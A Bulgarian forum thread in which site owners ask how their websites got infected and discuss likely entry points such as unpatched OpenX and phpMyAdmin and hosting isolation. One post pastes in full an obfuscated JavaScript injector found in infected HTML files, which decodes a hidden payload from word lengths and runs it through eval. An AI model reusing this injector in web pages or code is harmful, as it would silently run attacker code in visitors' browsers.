Как пробиват вирусите в сайтовете?

Re: Как пробиват вирусите в сайтовете?

Ако някой ми каже как в тоя началния екран GRUB където избираш коя операционна система да бутва, да си променя реда и да сложа уиндоуса отогре, ще си инсталирам пак линукса. Ти коя дистрибуция на линукс иначе ползваш ?

Код:
/boot/grub/menu.lst
http://boff.wordpress.com/2007/01/17/editing-bootgrubmenulst-to-change-the-grub-boot-menu/
 
Re: Как пробиват вирусите в сайтовете?

Скоро имах подобен проблем (с JS вирус) и се оказа, че има дупка в OpenX и доста сайтове из целия свят са пострадали от това. Така че и в случая може и да е такъв проблема, а ако нямаш OpenX - предупреждение важи и за всички останали - който скоро не е ъпдейтвал, да го направи час по-скоро.
 
Re: Как пробиват вирусите в сайтовете?

нашия сайт също беше заразен с това:

PHP:
<script>var KevNave=50;KevNave+=-49;ZaGek='bajekemehakaletefagegahekecere';var JeyCeyei=parseInt;var BeVelafn=0;BeVelafn+=16;LavaXexad=58;var NebYabee='e7vJarXulSJ3'.replace(/[7JrXuSJ3]/g, '');var GeyaFatet='pafadeq yemah qajeted cacededexafataze pepaqar pewe vakebene gejexe zepalax neledeteyakale vagejef keyera wefayes hakerasenenemes tejemeca nelaf val hevenakejaleyad malanepa pegakave cafekaxe ben sanawam fecaxenece kaqaqepa haked pebayaz yezera mem fegaceyew beb becedede maqe defepetenelan hafexed cajesahefe ceqejap qecesay xatapeka yen leweyeb fe hejefez megegerexeketa qaweqad zahele dan s daxesane lele zejejat hebe peneyete baz qayamez labejawepemefema yawejer devatedajarez leqasec mezehakemezac gapasay xefevenehe nenavaf rehawacahexadew zebaraq veqaneke xeze lenanekajebaze mez fax senanek tevelayeheseyem wanevez fenepeyawegexaxe jen neg xex c teqeveze ramahala lezefez fedepemeye pemewes hesay dayezeye kameh yabexam devezavam gara meseweletepabe wak yew nega he hel ver nem q tekavep yawewacem weqawak kalaze bavevef tagefenela lemegaf xabeveta hevafan zekemegac sebadepe jetan hega leqekeweqajela ger tev qeve xa qej yen web g teveseg xet ketayeq yebecezevekedefe fetahebe gev gekenev gefal yekahez kewaca zepeyaha zaq gena fateregejebexe jey zel nera k yap nez rec t gajapef gekeham yavegase lev racaweb je nafepev yesecaqeherece gevemev sebele mayagev beb xarejad beyahaxevezakeka jeqavaja nen depayev velas cenefag wefeye sevapeme yev gega zatelayagawera mer haq rede r wag xeq neb t vesegeke yare nexetehe wef lalefez geye deha xarehejezetaze qet xem levewer pamevebac bekawewa waqey jeresele lezej qetefeme z qeze jezemebamas xek yepazarejegedema ham vedakebemacaweme tewavet dexej feleweg nepewe wageheba q lehezal kakere gahabej vawafenevezaqah keseqeg ce lefageg xayerekafapefa qar kapewevepekaken jeyafem mehe lenevet vaxagegevagepane fewerex selekelebeqeye fes cegeyayacegerave tezeras xeme selezex cavekesahafedeye selaseta haxete zereneb medatagewehegen jahapase qenec laje nav reta qem qez maqenalelegepar pelemere h leyeyeg kemefejez pavabeva r jem fel fere xewahacarejetar qeva yadebegetahep hev mecekejemehabeka qaxelad sadekehaca kezelah zeqarev texaceme peb veqezam ye yepajam yepasaceteneha zemabet mefave reqa jeleneyehezaner bat femahate ren caseceyele'.split(' ');var LerGeweo=18;LerGeweo+=-18;var CefejCapac='fIrYsojvmFCUnKh2la9PrHC6XPoyudVei'.replace(/[IYsjvFUnK2l9PH6XPyuVi]/g, '');BetJa=96;var CaneTegas=String;var JeyQen='';var HekesWaxew=window;var FedaReveo=38;FedaReveo+=-36;BeYe='sayabaraselahake';NebYabee=HekesWaxew[NebYabee];CefejCapac=CaneTegas[CefejCapac];for (FepefVeji=LerGeweo;FepefVeji<GeyaFatet.length-1;FepefVeji+=FedaReveo) JeyQen += CefejCapac(JeyCeyei((GeyaFatet[FepefVeji+LerGeweo].length-1).toString(BeVelafn)+(GeyaFatet[FepefVeji+KevNave].length-1).toString(BeVelafn), BeVelafn));NebYabee(JeyQen);</script>

аз не съм се занимавал, но първо е имало 9 заразени хтмл файла. Почистиха ги, но веднага след това са се получили 90 заразени.
Аз нямам са сега достъп до логовете. Но като ги получа какво да гледам там. Как влизат?
Тия наглед безсмислени думи в скрипта, някаква кодировка ли са, евал някакъв?
 
Последно редактирано:
Re: Как пробиват вирусите в сайтовете?

така като гледам, датата на създаването на темата е от началото на август, когато излезе една брутална дупка в phpmyadmin. нищо чудно, ако на хостинга го имаш, и админите на са го били ъпдейтнали навреме, влизането да е станало оттам. дори този phpmyadmin да не е бил в твоя споделен хост (вече зависи от това, как е организиран самия хостинг).
та, не търсете нещата с налучкване. това с windows, вирусите и т.н. също е вариант, но много минимален в твоя случай с този конкретен хак. това е автоматичен скрипт, дето е обиколил целия свят. не си ти единствения, както чета из нета.
 
Re: Как пробиват вирусите в сайтовете?

Да и това се наблюдаваше,но само на сайтове с уникални IP-та. Правеха се рекуести, които съдържат в URL-а phpmyadmin без дори да има инсталиран такъв в public_html дирекотрията на потребителя. phpmyadmin при cPanel акаунтите се достъпва, само ако си се логнал в контролния панел, а ако имат достъп до контролния панел, phpmyadmin ти е последния проблем.
 
Re: Как пробиват вирусите в сайтовете?

phpmyadmin при cPanel акаунтите се достъпва, само ако си се логнал в контролния панел, а ако имат достъп до контролния панел, phpmyadmin ти е последния проблем.

това добре, но ти никога не можеш да знаеш, дали някой не си е инсталирал отделно phpmyadmin, примерно. аз не държа да е било точно през него, но е 100% сигурно, че е станало през известна на целия свят дупка в някой такъв софтуер. понеже, обаче, датата на хака съвпадна с една такава масова атака из целия свят, и то с абсолютно подобни резултати, за това реших, че може да ви предложа и този вариант.
 
Re: Как пробиват вирусите в сайтовете?

това добре, но ти никога не можеш да знаеш, дали някой не си е инсталирал отделно phpmyadmin, примерно. аз не държа да е било точно през него, но е 100% сигурно, че е станало през известна на целия свят дупка в някой такъв софтуер. понеже, обаче, датата на хака съвпадна с една такава масова атака из целия свят, и то с абсолютно подобни резултати, за това реших, че може да ви предложа и този вариант.

Реално може да се разбере, но това е един допълнителен процес, по време на ежедневния бекъп, който да инслепктира съдръжанието и да товари допълнително. Общо взето компромисното решение е да се ограничи действието само до файлове с права за достъп от потребителя (т.е. само негови си файлове) и от там нататаък дори и да бъде хакнат, да не може да се достъпи чужд акаунт на сървъра. Което вече почти всички хостинг провайдъри в БГ направиха.
 
Re: Как пробиват вирусите в сайтовете?

мда, така е 🙂
само да вметна - както има SEO-та.. така има и Security Advisor-и 🙂
 
Re: Как пробиват вирусите в сайтовете?

А освен криптирането и личния компютър има поддържате ли други защити? Мен преди време ми бяха хакнали един блог, изчезна цялото съдържание.

Аз бих ти предложил ето това - ZB Block. На мен ми пази всичките 5-6 сайта и не си спомням да са ме хаквали в последните 6 години.
Ще помоля само, ако го инсталираш, за обратна информация - на каква система е инсталиран, възможни проблеми и т.н. Питам, защото участвам в разработката заедно с автора от около 2 години и е добре да имаме повече инфо. 🙂
 
Re: Как пробиват вирусите в сайтовете?

хъм, това звучи интересно като разработка. ще го погледна скоро. но сайтът, за представянето му ме... втрещи 🙂
 
Re: Как пробиват вирусите в сайтовете?

Аз бих ти предложил ето това - ZB Block. На мен ми пази всичките 5-6 сайта и не си спомням да са ме хаквали в последните 6 години.
С тази phpBB 2-ка мислиш ли, че си предпазен от ЗБ блок?
 
Re: Как пробиват вирусите в сайтовете?

хъм, това звучи интересно като разработка. ще го погледна скоро. но сайтът, за представянето му ме... втрещи 🙂
Това похвала или отрицание е?
Дизайнът му е много шантав (имитира стара военна апаратура от 50-те години на 20 век), но той започна като сайт, посветен на играта Фолаут и продължава да се занимава и с това, независимо, че вече му придадох и друга насоченост - компютърна и Интернет сигурност.

С тази phpBB 2-ка мислиш ли, че си предпазен от ЗБ блок?

Определено да, защото не е само той - вързал съм си гащите с поне 3 връвчици. 😀 А от phpBB 2-ката е останала само фасадата. Твърде много труд съм хвърлил през годините (тръгна от 2.0.18 и го ъпгрейдвах и модвах с времето) и ми е жал да го съсипя. Освен това си има уникален дизайн и го пазя заради световната Фолаут общност, която го знае и уважава като единствен в България.
Иначе сайтът е шантав - върви в няколко посоки, но пък е интересно да се занимаваш с него. 😀
 
Последно редактирано:

Back
Горе